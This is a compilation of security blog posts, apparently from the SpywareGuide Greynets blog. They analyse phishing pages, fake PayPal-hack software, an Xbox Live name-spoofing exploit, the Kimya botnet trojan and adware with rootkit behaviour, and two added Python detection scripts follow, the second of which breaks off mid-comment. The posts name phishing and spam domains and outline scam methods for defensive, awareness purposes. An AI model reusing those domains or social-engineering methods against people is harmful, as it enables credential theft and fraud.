Results matching “About Blank” from SpywareGuide Greynets Blog

Here's a rather worrying exploit on the XBox Live service that opens users up to profanity and (more seriously) the possibility of being socially engineered by people who appear to be official Microsoft representatives and / or people working for videogame companies.

What are they doing?

When you have an XBox Live account, you have a Gamertag - in other words, your username. Microsoft have things like profanity filters in place to ensure your username isn't full of swearwords, and it costs money to change your gamertag, so in general it's unlikely someone is going to keep changing their gamertag simply to hassle someone. As a result, people who do hassle others on XBox Live are fairly easy to keep track of and hit with the banhammer when needed.

However - in the last few days, it seems an exploit (previously kept secret) has been leaked on a number of forums, and now it's rapidly spreading across the interwebs (or the gaming portion of it, anyway). As with all of these XBox related problems, it stems from being able to connect the console to the PC, edit data then place it back onto the console.

Without going into too much detail, you use a combination of this:


....and this:

[Image: xboxhaxing2.jpg]

....and then thoroughly hexing your data. Once this is done, your gamertag (when in a game) will temporarily look like whatever you placed into the edited data. Those of a nervous disposition sensitive to copious amounts of swearing might want to look away now:


Avert your eyes, children, originally uploaded by Paperghost.


Amazingly, you're not supposed to be able to do that.

However, this exploit not only allows you to call yourself Sweary Mc Swearword, it also allows you to leave the name space entirely blank, which results in much confusion and a decrease in the possibility of you being reported for bad behaviour. As you can see, these fake names filter through to services associated with XBox Live, so Bungie (creators of the Halo franchise) quickly end up with swears and / or blank names on their statistics pages. Here's a blank name:


The Invisible Man, originally uploaded by Paperghost.


...and here are some extremely offensive swear words, along with multiple users claiming to be Shishka, a well known Bungie staff member.


Swears and Shiska, originally uploaded by Paperghost.


Of course, this raises an important issue - if people can pretend to be well known videogame staff, they can also pretend to be Microsoft employees and then blow the doors wide open with regard to phishing for information and / or login details. We'd already seen a few people talking about pretending to be "Microsoft admins", when someone emailed the following screenshot to us:


Hi, I work for Microsoft. No seriously., originally uploaded by Paperghost.


I've no idea who this person is, but as you can see, they claim to be "Microsoft!" Combine this with people running around in videogames asking for login credentials, and you have a bad situation.

It goes without saying, so I'll say it anyway - DO NOT GIVE YOUR LOGIN DETAILS TO ANYBODY ON XBOX LIVE CLAIMING TO BE FROM MICROSOFT.

EVER.


We've passed on what we have to Microsoft and hopefully they'll address this issue quickly. For now, be wary of anybody claiming to be from videogame companies and Microsoft. If in doubt, headshot the sucker..

There's been a rash of spam zinging around on Twitter, all of which is directing users to

SmartEcard.com

You can see more about that here, on the Sophos blog. The spammer tactics seem to be changing a little bit, perhaps so they can avoid detection for a little while longer. We're starting to see profiles that don't send out spam links via messages, but instead place the spam URLs in the profile description instead.

Here's a sample; you'll probably spot the rather odd pattern the URLs follow:

[Image: scard2.png]

twishmake.com
twiles.com
twantastic.com

Um, yeah. A little bizarre, I'm sure you'll agree. All of the above domains look identical to the SmartECard domain; there are probably more out there too:

[Image: scard1.png]

As with the warnings about the original domain, if you've entered any login details at the above sites, go and change them immediately just to be on the safe side. Interestingly, all the profiles I've seen related to this scam are blank placeholders with no photo or information added to the fake profiles. However, there IS one where they've made a basic attempt to look like a real person:

[Image: scard3.png]

Don't be fooled - the above profile is as fake as the rest of them. While you're probably sick to death of being told to watch what you click on Twitter right now, it's about the best advice anyone can give.
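The shift described above, from spam links in messages to spam links in the profile description, is the kind of thing a simple triage script can surface: look for accounts that never post a link in their tweets but carry one in their bio, and cluster the domains those bios point at. The Python below is an added example written for this page, not code from the original post or from SpywareGuide. The profile records are constructed sample data, and the follower threshold, the two-letter prefix clustering and the allowlist are assumptions chosen to show the technique, not a published detection rule.

```python
import re
from collections import defaultdict

# Constructed sample profile records (not real accounts), modelled on the
# behaviour described in the post: spam accounts that never tweet a link but
# carry a look-alike domain in the profile description instead.
SAMPLE_PROFILES = [
    {"user": "alice_dev", "description": "Python, coffee and hiking. Blog: https://alice.example.org",
     "tweets_with_links": 12, "followers": 340},
    {"user": "x8412ka", "description": "check out my card http://twishmake.com/?id=19",
     "tweets_with_links": 0, "followers": 2},
    {"user": "m9a02ll", "description": "http://twiles.com/?id=44",
     "tweets_with_links": 0, "followers": 0},
    {"user": "qq10pp", "description": "send a free card http://twantastic.com/?id=7",
     "tweets_with_links": 0, "followers": 1},
    {"user": "bob_runs", "description": "Marathons and trail runs. http://bob-runs.example.com",
     "tweets_with_links": 3, "followers": 88},
]

# Hostname of every http(s) URL; the capture stops at '/', '?', '#' or whitespace.
URL_RE = re.compile(r"https?://([^\s/?#]+)", re.IGNORECASE)

# Assumed allowlist: the genuine brand that the tw* look-alikes imitate.
ALLOWLIST = {"twitter.com"}

# Assumed threshold: an account with fewer followers than this is treated as a throwaway.
MAX_THROWAWAY_FOLLOWERS = 5


def extract_domains(text):
    """Return the lower-cased hostnames of all URLs found in a description."""
    return [host.lower() for host in URL_RE.findall(text)]


def is_bio_only_linker(profile):
    """True when the only link the account publishes is in its bio and it has
    almost no audience, which is the combination the post describes."""
    has_bio_link = bool(extract_domains(profile["description"]))
    return (has_bio_link
            and profile["tweets_with_links"] == 0
            and profile["followers"] < MAX_THROWAWAY_FOLLOWERS)


def lookalike_clusters(profiles, min_cluster=2):
    """Group bio-only link domains by the first two letters of their first label.

    Returns {prefix: sorted domains} only for prefixes shared by at least
    ``min_cluster`` distinct domains, which is how a family of template
    domains such as the tw* set in the post surfaces."""
    by_prefix = defaultdict(set)
    for profile in profiles:
        if not is_bio_only_linker(profile):
            continue
        for host in extract_domains(profile["description"]):
            if host in ALLOWLIST:
                continue
            first_label = host.split(".")[0]
            by_prefix[first_label[:2]].add(host)
    return {prefix: sorted(hosts)
            for prefix, hosts in by_prefix.items() if len(hosts) >= min_cluster}


def flag_profiles(profiles):
    """Usernames whose bio links into a detected look-alike cluster, sorted."""
    suspicious = {host for hosts in lookalike_clusters(profiles).values() for host in hosts}
    return sorted(profile["user"] for profile in profiles
                  if any(host in suspicious for host in extract_domains(profile["description"])))


if __name__ == "__main__":
    for prefix, hosts in lookalike_clusters(SAMPLE_PROFILES).items():
        print(f"cluster '{prefix}*': {', '.join(hosts)}")
    print("review these accounts:", ", ".join(flag_profiles(SAMPLE_PROFILES)))
```

The prefix clustering is deliberately crude: it catches a family of domains built from one template, as in the screenshots above, but on real data you would add signals such as domain registration age and shared hosting before acting on a cluster, and the threshold values are placeholders to tune against your own feed.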

[Image: zangani1.jpg]

For a long time now, I've wondered exactly why so many people are creating identikit websites, all asking you to install Zango in return for "free" movies and TV shows, almost always illegally ripped and streamed without the permission of the rights holder.

These sites have become something of a plague over the last year or so, and sometimes they seem to tie into other areas such as cookie cutter sites offering games. Who can forget the wonderful Batman game from a few months ago that followed the same template as the movie sites?

At any rate, I've spent quite some time trying to find out who could have come up with the idea of telling everyone to run out and make these movie / TV sites. It stands to reason that the idea of creating these things en masse and rolling them out to the public at large must have had a good, solid nudge from somewhere, right?

Well, step right up, interesting and faintly outrageous PDF Document.

For your eyes only, Ladies and Gentlemen:

"Annihilating Zango For Skyrocket Profit".

No really, that's the title.

[Image: zangani2.jpg]

What we have here, is nothing less than an instruction manual encouraging people to go out and create as many of these movie streaming cookie cutter sites as possible to make a tidy profit from installing Zango. I should add, right at the outset, that this has NOT been created by Zango - rather, an enterprising person (or persons) that decided to hop on the gravy train.

Indeed, check out the comical "disclaimer":

[Image: zangani3.jpg]

This entire document promotes illegal streaming to make a profit and unethical activity (it even has a section on how to get an account approved with Zango if you've been previously rejected), yet the creator says "I'm not responsible".

Well, there's a surprise.

Even better, he says "You have NO rights to distribute this document", yet he stomps upon the copyright of the TV show creators he's making money from without permission. Once again, I'm shocked. On the bright side, I'm definitely not "dumb" where obtaining a copy of this document is concerned, because I woke up to find it tucked under my pillow.

Moving on, the rest of the introduction gives you a general rundown on Zango, payout rates and a screenshot of his earnings. Then we come to this:

[Image: zangani5.jpg]

I'd take issue with this being the "only unethical thing" in the PDF, considering the whole thing is based on generating profit from pirated movies but anyway. Some choice extracts:

"Now, when you signup with Zango, use some fake details" is a nice start. I've blanked out his actual method for attempting to scam Zango, but honestly? I'm a little surprised that he claims such a stupid technique actually works.

As for this:

"...I've never been verified by phone, because I registered under a famous Zango user and he simply told them to accept me anyway".

If that's true, I'm dazzled - especially given that this guy is the King of promoting installs via pirated material in PDFs you have to pay $10 to $15 to obtain.

The next section shows you how to build a site quickly, targeting the TV shows most likely to make you a lot of money. Oh, I forgot - the package comes with phpvideoscript, which enables you to build an endless stream of identikit websites.

[Image: zangani6.jpg]

Handy, eh?

[Image: zangani7.jpg]

Good job Lost is keeping him rolling in the money. It goes a bit wrong on the next page though, because he leaves what is apparently his Zangocash username in the screenshot.

[Image: zangani8.jpg]

Say hello to xMastex! If Zango are reading this, you might want to go slamdunk his account in a ditch (if you haven't already), seeing as he's

1) Making money from PDFs ready rolling websites designed to profit from illegally ripped TV shows and movies via installs of your Adware and
2) Giving out "unethical" advice with regard to joining your program with fake details.

[Image: zangani9.jpg]

As you can see above, he then goes on to list the best places to grab ripped streams, ready to be placed on your freshly created army of websites. Because of the system used to manage the sites you've created, you can add a stupid amount of videos to the pages with little to no fuss:

[Image: zangani10.jpg]

The rest of the document covers sites to submit your movie links to, traffic boosting and tricks involving places such as Sidereel.com. Oh, and this:

[Image: zangani11.jpg]

...I thought the only unethical part of this PDF was the bit where they signed up to Zango with fake information? Oh well.

Who is Doing This?

Well, there's a bit of a tangled web where that's concerned. A number of different names are used in Whois for many of the sites referenced by "Mastex" on various places, the document signs off as "Stefano" and there's apparently an updated version of this document floating around on the net too.

To make things more complicated, it seems there are quite a few people now making their own versions of these PDFs.

There's usually a trail though, and sure enough I happened to find a review of one of these PDFs where someone is asking for "review copies". It's screenshot time:

[Image: zangani12.jpg]

It's pretty likely "Marko" and Mastex aren't the same people, because Stefano appears here as Mastex on Digg - but he's certainly promoting one of his own PDFs. The reviewer blanked out the URLs, but it's not too difficult to Google Marko + Gossipgirl websites...

[Image: zangani13.jpg]

Look at that - someone called Marko spamming links to viewgossipgirl.info, via a number of streaming sites. However, the really interesting bit is the Digg link.

[Image: zangani14.jpg]

Well, I'm surprised by all the "watch free episodes online" links. Honestly.

Do a Whois search on Sick-Videos.net, and...

[Image: zangani15.jpg]

Man, someone forgot their anonymous Whois Guard, didn't they?

The document Marko is pushing seems to be different from the original Mastex version, so it's entirely possible there's a whole industry out there involving people creating (then selling) their very own "make money in a dubious fashion" PDFs. All of the Marko sites that offered up Zango (here's one) seem to have had the Zango popup removed so perhaps they killed his account - but that doesn't mean he has to stop selling his PDFs. And so the industry continues to grow.

The question is, when is someone going to do something about it?

Free Microsoft Points Phish

This is a particular favourite of Phishers - a page claiming to give you free Microsoft Points for XBox Live, only to take your login and do what they want with it (which could range from using the credit card stored against your account to buy lots of games you don't actually want to just trashing your gamer profile).

With that in mind, then, here's the offering for today:

freemspoints4all.blackapplehost.com

[Image: step1.jpg]

The "3.1" in the bottom right hand corner is particularly humorous. Anyway, hit "Click here" and you're taken to a standard fake Live login page:

[Image: step2.jpg]

If the unwary visitor should enter their details, some code in a .php file will stash the login for the Phisher to grab later while immediately redirecting you to the following (entirely fake) message on a blank page:

[Image: step3.jpg]

If you get to the stage where you see this message, you should be thinking about logging in as quickly as you can and changing your password. Top tip for the day - any website that offers "Free Microsoft points" should be avoided like the plague. I've yet to see a genuine one, and I think I can safely say I'll be waiting for quite some time before I do...

"After all, I am a member of the press and therefore have received some preferential treatment on this matter" - Dan Hsu, IGN

Well, that might explain why he had the police and the FBI all over his stolen XBox Live account. Definitely worth a read though, and the Top Seven Tips make up for the whole "preferential treatment" thing:

  1. Don't answer your secret question with the real answer. Instead, select something completely unrelated (for example, First Pet = Will Tuttle) that you can remember, effectively giving you a second password.
  2. In the "address 2" line of your profile, put down: "XBOX SUPPORT DO NOT ASSIST WITH ACCOUNT RECOVERY" to help automatically raise a red flag when a customer support rep looks up your account.
  3. If you're planning on gaming away from your default console, put your account on a memory card or move it with your hard drive, as opposed to recovering it on another machine.
  4. Never reveal any personal details about yourself while gaming over Xbox Live.
  5. On that same note, go ahead and leave your profile's bio blank. No need to tell everyone where you live.
  6. Limit the amount of information you put out there for everyone to see on social networking sites...or any website for that matter. Especially ones where you also have your Gamertag listed.
  7. Create an Xbox Live passcode if you haven't already. To do this, select "My Xbox" on the Xbox dashboard and go to your profile, then go to "Account Management" then "Xbox Live Pass Code."

Magic EBay Money

This particular program we're about to look at is currently being promoted via videos on sites such as Youtube. The program is touted as an "electronic Paypal hacker" - supposedly, it reaches right into Paypal's systems and simply "creates digital money", depositing an amount of your choice into your Paypal account. There now follows some cod-technospeak as the creator attempts to define this supposedly "victimless" crime:

[Image: pp12.jpg]

"All verified accounts are stored on a verified server. That's where all the cash gets sent. When people send cash, they send packets. When you have $10 or more, that means you have enough packets for the hack to execute. When people send the fake PP cash, I grab their packets and it adds to your account. It is completely legal, Paypal money is electronic so no harm done to ANYONE!"

....sigh. Well, there's no harm done except to anyone foolish enough to fall for such a scam. In time honoured tradition, this is what the EXE looks like on your desktop:

[Image: pap1.jpg]

Look, a moneybag! It has to work! Fire the program up, and...

[Image: pap2.jpg]

Very slick looking. Hit the "I Agree" button, and you'll see this:

[Image: pap4.jpg]

...you're presented with a rather fetching interface. In the spirit of making you think they're doing you a favour, you can find an MP3 player built in, links to popular networking sites along the bottom (along with a few hacking sites for good measure) and a big blank browser window.

How does this program work?

[Image: pap5.gif]

Yes, amazingly that's all there is to it. Honest. Hit "Connect", and you'll see some random messages appear in the Status Display - just to make you feel more like you're really doing something hacker-ish:

[Image: pp10.jpg]

[Image: pp8.jpg]

With programs like this, who needs to watch The Matrix? Anyway, the previously empty browser window now fills up with the Paypal website:

[Image: pap6.jpg]

Our wannabe hacker still hasn't actually hacked anything yet, but fear not - hit the "Add Cash" button (after selecting an amount of either 100 Dollars or Euros), and the following screen appears:

[Image: pap11.jpg]

"Choose the amount you want, then login in this TPPH Login page to receive the money into your account. Attention: This will not work if you don't have a valid (verified) Paypal account containing $10".

Of course, anyone familiar with Paypal will know that this popup is not from the official Paypal website - it's something the creator of the application has put together. Let's see - they want you to "Submit" your Paypal login details somewhere....they want you to have a Verified account....and they request that you already have a minimum amount of cash in there when you submit the information.

Does that sound like you're going to get free Paypal money? Or does it sound more like you've just sent your Paypal login details to a complete stranger in an overly elaborate fashion?

We detect this as PPHack.

(Thanks to Senior Threat Researcher Chris Mannon for additional research).

Don't Panic

Sometimes it's easy to believe that every last thing online is going to eat into your PC, burn your house down, kill your cat and so on. The last few days I'd been hearing rumblings about some "Youtube rap video" and a file that would start hijacking your PC - well, thanks to a tipoff from a forum-goer at Spywarewarrior, I can hopefully put this one to rest.

In short, a video promoting a rap mix-tape supposedly took you to a file that "hijacked your PC with Spywarestop". In actual fact, there's no file to hijack you. Let's take a look - here's the Youtube page in question:

[Image: mixtape1.gif]

As you can see, there's the mix-tape being advertised and a link to Mediafire, where the mix-tape is hosted. Click the Mediafire link, and all that happens is you'll see an advert for various antispyware tools - some of them on the Rogue Antispyware list, some of them not on the list but known to be of little worth to the end-user.


[Image: mixtape2.gif]

In this particular case, it's an advert for Adware Alert. It's not hijacking you, or breaking things or making your browser fly around the screen, nor is it a "virus". It's just an (admittedly loud) advert. If you're running a browser compatible with Adblock Plus, all you'll see beneath the Mediafire logo is a blank space. Even if you're vaguely alarmed by the advert, all you have to do is click the "Continue to Mediafire.com" message at the top right of the screen (missing from the above screenshot as I cropped the image too small - whoops) and you'll be taken to the file you requested.

Like the title says - don't panic. This really isn't something to worry about too much. Even the most obnoxious rogue antispyware advert (the ones that do resize your browser, throw up endless popups and make annoying "Woop woop" noises) can usually be escaped by simply hitting CTRL+ALT+DEL and using Task Manager to close your browser session.

Television often relies on fake codes, phone numbers and addresses to make up part of its fictional worlds. Sometimes, it can go slightly wrong - how many people tried to call Doctor Who last week?

D'oh.

Actually, "D'oh" is rather appropriate here. In an old episode of The Simpsons, it was revealed that Chunkylover53@aol.com was Homer's email address. Of course, Simpsons fans galore with net access immediately added "Chunkylover53" to their AIM contact list. As this article points out....

Homer's e-mail address chunkylover53@aol.com, as seen on EABF03, was registered by writer-producer Matt Selman, who also replied to e-mails from fans testing it. "He logged in the night that the episode aired and it was immediately filled with the maximum number of responses. He's tried to answer every one of them and then as soon as he answers a hundred, a hundred more pop in," Al Jean told the New York Post in January 2003.

What's interesting here is that as far as I'm aware (and please, correct me if I'm wrong), the AIM screen-name "Chunkylover53" is not necessarily connected to the "official" chunkylover53@aol.com email address - anyone could have set up that AIM screen-name, using whatever email address they feel like. However, people will naturally add "Chunkylover53" to their AIM accounts thinking it will be the "real" Homer. This is where the problems set in.

The "Chunkylover53" AIM screen-name hasn't logged in for quite some time, apparently. Imagine the puzzled expressions worn by Simpsons fans when, all of a sudden, the account came back to life in the last few days with this in their "Away" message....

[Image: kimya0.gif]

...yes, "Homer" has seemingly returned, and he comes bearing infection files!

Of course, the "exclusive Simpsons episode" is nothing of the kind - what you actually download is a file called "Kimya.exe", about 150kb in size, and it looks like this:

[Image: kimya1.jpg]


Run the file, and you won't see a new Simpsons episode - you're actually more likely to see this:

[Image: kimya2.jpg]


....a strange error message that mentions "photos" (probably fake), followed by lots of real error messages as most of your desktop fails, leaving you with an entirely blank screen:

[Image: kimya3.jpg]


[Image: kimya4.jpg (if you really must!)]

From this point onwards, the PC will likely need a reboot and will be sluggish until cleaned up, constantly throwing out error messages, crashing when attempting to open Windows Explorer etc.

Now, given that the infection links are being passed around via IM Away messages, there was always going to be the possibility of an Instant Messaging worm attack. However, a lot of testing has taken place and so far, we haven't seen any malicious messages or URLs sent via AIM or MSN Messenger.

That's no reason to get complacent though, because what we have seen taking place is possibly quite a bit worse. First of all, a number of hidden files are dropped onto the PC, including Rootkit technology (which the bad guys have helpfully pointed out in the code):

[Image: rootkitkim.jpg]


Worse, your PC is deposited into a Botnet of Turkish origin - here's the giveaway traffic stream via an Ethereal log:

[Image: kimyabots.gif]


....awaiting further instructions from the Botnet C&C center. This particular Botnet has been around since March of this year. The Turkish connection is interesting, because I haven't seen too many Turkish Botnets - and there's been quite a surge in hacking activity from Turkey recently (most notably the DNS attacks on Photobucket and ICANN by NeTDevilz).

Finally, the infection drops a number of other files onto the PC besides the Rootkit, which are seemingly related to a new variant of this Chinese infection.

It's worth noting that there may only be Instant Messaging infection links sent out if the person running the Botnet Command Center decides to issue all the drones with such a command - so while we haven't seen any IM infection activity, it would be wise not to rule it out completely. We recommend infected users keep an eye on all Instant Messaging activity until they can clean the infection from their computer, just in case.

Whoever is responsible for these messages has changed them a couple of times already - last night, the download link had been updated to look like this:

[Image: kimya66.gif]


...and it currently advertises a link for a dating website:

[Image: chunkyaway.jpg]


We've reported all links related to this attack, and at least two of the files claiming to be "exclusive Simpsons episodes" are currently offline, though there's bound to be more out there. For now, this is a good reminder to be cautious when randomly adding cool things seen on TV and film to your online applications - you can't always assume the person at the other end is entirely in control, or indeed, related to what you're looking for in the first place.

We detect this infection as Kimya.

Additional Research: Chris Mannon, FSL Senior Threat Researcher
Deepak Setty, FSL Senior Threat Research Engineer

A while back, I wrote about the recent Dreamcast Phish and my declaration of love for the ill-fated console (which is currently undergoing something of a Renaissance with home brew kits, games and movie appearances) seemingly took a few of you by surprise, especially those that also had a thing for the SEGA console! I thought it might be fun to post up some pictures of my gaming collection - feel free to post up links to yours, because stuff like this is always interesting. Shall we start at the beginning? Oh, as this post is image intensive I'm sticking the main content after the jump so if you're not interested in looking at lots of pictures of plastic and cardboard, now is the time to turn back!

For those that are still with me.....

I'm still trying to process this to be perfectly honest, but one of my close contacts has confirmed there is someone going around either hijacking, hacking or phishing user accounts on Facebook, then randomly uploading pictures of child torture to their photo albums and / or funwall.

.......yeah, that's messed up right there.

So far, I have one definite confirm on at least two accounts that were taken over (most likely by the same individual), one of which had the child torture pictures uploaded to it and the other - well, it wasn't child torture but it nearly cost someone their marriage, according to my friend.

This happened a few weeks ago, and Facebook apparently haven't replied to the person who raised it with them yet. I've also heard a few mutterings about other accounts taken over with extremely dubious content posted to them, but nothing confirmed on those yet.

Obviously, if you're at work (or even at home) and you suddenly click into the kind of material mentioned above, you could get into all sorts of trouble real fast. While I'm not about to suggest everyone jumps out of Facebook right this instant, I would advise extreme care with your login credentials while this lunatic is on the loose.

My friend (who reported the hacked profile that was on his friends list) has confirmed the lady who was hacked didn't save any of the images (which is understandable, really). So no blanked out screenshots to show you - if we get confirmation of these postings, we'll update with more information as we get it...

/ Update - As I've said here, this is NOT a "wave" of attacks, merely two profiles that have apparently been tampered with. Remain vigilant, but please, no need to start panicking.

Myspace: What Happened Here?

Last week, I heard rumblings of an "interesting" screenshot doing the rounds on a few forums, but I had no clue where to look for it. Then someone anonymously popped up on MSN - as they quite often do - and sent me a link to the screenshot in question.

As you might have guessed, the screenshot involved Myspace. What's worrying here is what the contents of the screenshot could mean, and the less than amazing response I've had back from Myspace. See, let me say this right away - whenever you trawl through the super secret security mailing lists, backroom areas on forums etc - there's always one question that keeps popping up, and it usually always draws a blank.

"Anyone got a contact for Myspace?"

Most of the time, nobody ever does. For all intents and purposes, their security team - whoever they are - might as well reside in another Galaxy. So when a screenshot containing what looked like a pile of sensitive data related to Myspace came my way, my eyes started to roll and didn't stop for three whole days.

Now, I had no clue what I was looking at but it didn't sound very good given that this was supposedly popping up on various underground forums. Some of the items from the screenshot included:

"Domain Account Administrator, Myspace"

"CSR-Tools"

"Account: Retail"

"Billing Information".

These are just some of the items contained in the screenshot. Besides that, there's a number of domains seemingly connected to Myspace down the left hand side and a bunch of contact information (Emails, names, addresses, User ID numbers) in the main portion of the page.

Has someone wandered into the main admin panel for Myspace? Is this something to do with a storefront related to the site? Is it something else entirely? Who knows, but you can probably guess what happened when I attempted to draw attention to this. I mailed them using their autoform last week - no reply.

I tried again this week, and this is what I sent them:

hello, my name is chris boyd, director of malware research
for facetime security labs. This is the second time I have
sent this through, with no reply so far. A few days ago,
someone pointed me in the direction of a screenshot a few
people had heard about (screenie URL goes here).

The screenshot appears to indicate your main CSR account
tools system was compromised in some way - can you confirm
what has happened here? I will be writing about this later
on today on my blog and would prefer to have the full
details as to the extent of what has (or has not!) happened here.

Thanks,
Chris

Can you guess what I got back?

Hello,

Below is a pretty comprehensive overview on blogs presented in an FAQ format. It should answer all the questions you have about blogs.

Q: What is a blog?

A: A 'blog' is an online journal. Blog is short for Weblog. In recent years, 'blogging' or posting an online journal has become very popular.

.....yes, thanks for the handy blogging tips(!)

I mailed them right back and this time, I was supposed to be given an answer by an actual person. As it turns out, the auto reply above made more sense than what I was handed back. I sent them the same Email above - this is what I got (bold emphasis added by me):

Hello,

Most errors are cleared up in a matter of minutes so try to access the page again in a minute or so. If it's a significant problem, we're probably already aware of it and are currently working to resolve it. Please be patient.

......wha? Thanks for advising me to try accessing your potentially compromised system again in a few minutes, but that doesn't really solve anything, does it?

I've resent yet again with a little note asking if anyone there actually bothers to read anything they're sent, but I'm not getting my hopes up. I'd like to think the above screenshot doesn't represent anything serious, but would someone bother posting something like that to websites if they didn't think it was a big deal in the first place? I mean, call me paranoid, but I'm not entirely certain I want to be anywhere near a Myspace page at the moment. Is it safe? Is it compromised? Nothing to worry about? Being taken care of? Who knows?

Little help, Myspace?

/ Addendum - I just received the latest reply to my efforts to draw attention to this, and it's the best one yet.

I sent Myspace this:

"Is anyone there actually reading what I'm sending you? I'm telling you that you appear to have been compromised, potentially quite badly. And you're sending me another reply that doesn't help and tells me to "try to access the page again in a minute or so"?! I guess that would be useful if I was the one doing the compromising, but this isn't really much use to me, is it?"

Let me repost my message for a third time."

This is what I got back:


"Hello,

We do not offer that option as it is not available within MySpace."

....I think my brain hurts.

Unfriendly On Friendster

It's worth remembering that it's not just social networking sites like Myspace that get all the hacker-style attention. Recently Friendster has had its fair share of wobbles, too.

From about July to August of this year, a virus was doing the rounds called "Saviour of the Seoul", which (at first glance) would likely seem to be a calling card for Korean hackers. Now, because I happened to do my University Dissertation on 20th Century Hong Kong Cinema - don't ask - I can add a little bit more to the thinking behind this, because I know that "Saviour of the Seoul" is a sly reference to a particularly crazy film from the early 90s resurgence of HK Cinema, called - obviously enough - "Saviour of the Soul" (minus the "e"). It makes no sense whatsoever, but it's very pretty. Anyway, for no good reason, our leet hax friends decided to name their virus after this film. If you had this appearing in your profile page code:

savioursoul.jpg

...then you'd have the words "Saviour of the Seoul" sitting in the bottom corner of your profile, quite often while the rest of the page remained blank. The only way to fix your profile at that point would be to scrub everything and start all over again.

There also seemed to be a slightly different version of this attack, where you'd have an image file placed on your profile instead:

savsoul1.jpg

...don't those Smileys look grumpy?

Anyway, over here, we have an apparent redirect to a .za domain. And finally, we have a rash of comments being posted to profiles that seem to say "hello", mixed in with some choice insults. To date, this final profile attack is still ongoing - we're looking into it, and will report back with any new findings...

http://blog.spywareguide.com/upload/2007/09/skinner1-thumb.jpg

Upon hearing bad reports about a product called "Messenger Skinner", we decided to investigate. The program (whose target audience must strongly favour kids, given that the most entertaining thing it gives you is dancing bananas) has a number of issues that mean I'd rather not recommend it. Note:

"Messenger Skinner is free of any kind of spyware or trojan".

Interesting statement. Let's continue.

skinner3.jpg

...looks innocent enough so far, but things are about to get messy.

http://blog.spywareguide.com/upload/2007/09/skinner5-thumb.jpg

Presented with a "real" installer. That's good.

The text box is stupidly small. That's bad.

The "no" button is pre-checked and you have to physically select yes. That's good.

I don't like the colour scheme. That's bad.

The EULA is certainly comprehensive. That's good.

But that's only because there's apparently two of them.

That's bad.

See, during install, the EULA you see is NOT the EULA you see by clicking "Terms and Conditions" from the program entry on your Start list. Indeed, once installed, all you really get is a very general ramble about liability, licensing and intellectual property. Right at the end, under "Uninstall", you get the briefest of mentions for this:

"UNINSTALL
This software is completely free as it is subsidized by the Favorit contextual advertising component."

....ooh. In fact, we need to hope that anyone installing the program not only took great note of the EULA during install, but copied and pasted it onto their system to get a better idea of what's likely to be going on in their system.

Namely:

1. USE OF THE SOFTWARE

1.1. MessengerSkinner, a Freeware application, offers a button which allows you to add funny emoticons and other things to MSN Messenger (R) 7.0, 7.5 and Windows Live Messenger (R).

1.2. The Software includes a component which will remain active at all times with the objective of verifying and ensuring the correct functioning of the Software, and offering other advantages ("Component"). When the User is connected to the Internet the Component will make periodic connections to the Provider's servers in order to check that there are no problems in the access network or the User's Computer. If any error which prevents the normal use of the Software is detected in the User's Computer, the Component will seek to identify and solve it. Any changes that the Component makes to the User's Computer will be to clearly non-essential parts thereof and for the purposes referred to in these Conditions. THE USER REQUESTS AND AUTHORIZES THE INSTALLATION AND UPDATING OF THIS COMPONENT TOGETHER WITH THE SOFTWARE IN ACCORDANCE WITH THE TERMS SET OUT IN THESE CONDITIONS. The Component will carry out the tasks described in these Conditions only when the User is connected to the Internet, whether using the Software or the User's regular Internet connection. In any case, the User can easily uninstall the Software or the Component by selecting "Access Connection" and "Component Add-On" respectively in the appropriate section of the operating system control panel. Users should be aware that upon such uninstallation, the advertising messages might be sent during a period of three months after said uninstallation, the benefits provided by the Component will not be available and in certain cases the Software (if retained) or the Provider's services may not function correctly.

Adverts for three months after uninstalling? Nice! As you'll see later, the hoops you need to jump through to uninstall hark back to the "good old days" of Direct Revenue making you download additional software to uninstall the first unwanted program. Tonight we're gonna' party like it's 2004! Yay!

1.4. In order to carry out the operations referred to in the paragraphs above, the Component will send certain data from the User's Computer to, and will receive information and requests for these purposes from, the Provider's servers. The data sent to the Provider's servers by the Component will be limited to technical and connection information such as: operating system user name, name of the computer in the operating system, IP address of the LAN of the computer, country of connection, browser default country, operating system version, operating system or browser service packs installed, ID of the most recent browser update, vertical and horizontal resolution of the monitor screen, IP address of the most recent internet connection, maximum and average response times, percentage losses, name of the last RAS connection and others relevant for the purposes indicated. The User authorizes such exchanges of information with the Provider's servers in accordance with these Conditions. At no time will any information regarding Internet sites visited or other activities of the User be sent to the Provider's servers; this information will be processed within the User's Computer in order to anonymously select advertising or other messages to be shown to the User. In no case will the Provider be able to identify the User nor will any profile of the User be created.

...."limited to"? What else is there left to grab, shoe size?

For the sake of this:

http://blog.spywareguide.com/upload/2007/09/skinner12-thumb.jpg

....I'm starting to feel pretty uncomfortable about installing this program. Oh, note that I had to blank a few smileys out because they were, er, sort of rude. Enjoy, kids!

Anyway, now we come to the meaty part. If you installed this program and happened to run, oh, I don't know....a bunch of Rootkit Scanners...you'd probably see something a little like this:

http://blog.spywareguide.com/upload/2007/09/skinnerend-thumb.jpg

.....and, from another testbox, something like this:

skinner14.jpg


skinner15.jpg

....hidden, randomly named executables? Oh, awesome. That's just what the world needs more of. I guess that's why Symantec say the following on this writeup, then:

"# Hides the following files by using rootkit technology:

* %System%\[RANDOM].exe
* %System%\[RANDOM].dat"

......to coin a phrase, whoops.
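The scanners in the screenshots above are doing what every rootkit detector of that era did: taking two views of the same directory and diffing them. A user-mode hook can only lie to the API it intercepts, so a second listing taken another way (a raw filesystem parse, a kernel driver, an offline boot) still contains the hidden file. The script below is an added example written for this post, not the output of any of the scanners shown; the two listings are constructed sample data standing in for the hooked view and the raw view of %System%, and the file names in them are invented.

```python
"""Cross-view detection of hidden files, the technique behind rootkit scanners.

Added example. API_VIEW and RAW_VIEW are CONSTRUCTED listings (name -> size);
the random-looking names are invented, not taken from a real sample.
"""
import re

# Hooked (user-mode API) view: what FindFirstFile/FindNextFile returned.
API_VIEW = {
    "kernel32.dll": 989696,
    "ntdll.dll": 706048,
    "user32.dll": 578560,
    "drivers\\etc\\hosts": 734,
}

# Raw view: what a low-level enumeration of the same directory returned.
RAW_VIEW = {
    "kernel32.dll": 989696,
    "ntdll.dll": 706048,
    "user32.dll": 578560,
    "drivers\\etc\\hosts": 734,
    "xkq8w1nz.exe": 122880,   # invented random-looking name
    "xkq8w1nz.dat": 4096,     # its sibling data file, same stem
    "ntoskrnl.exe": 2188800,  # constructed benign discrepancy (hooked view truncated)
}

# Heuristic for machine-generated names: one run of 6-12 lowercase letters/digits
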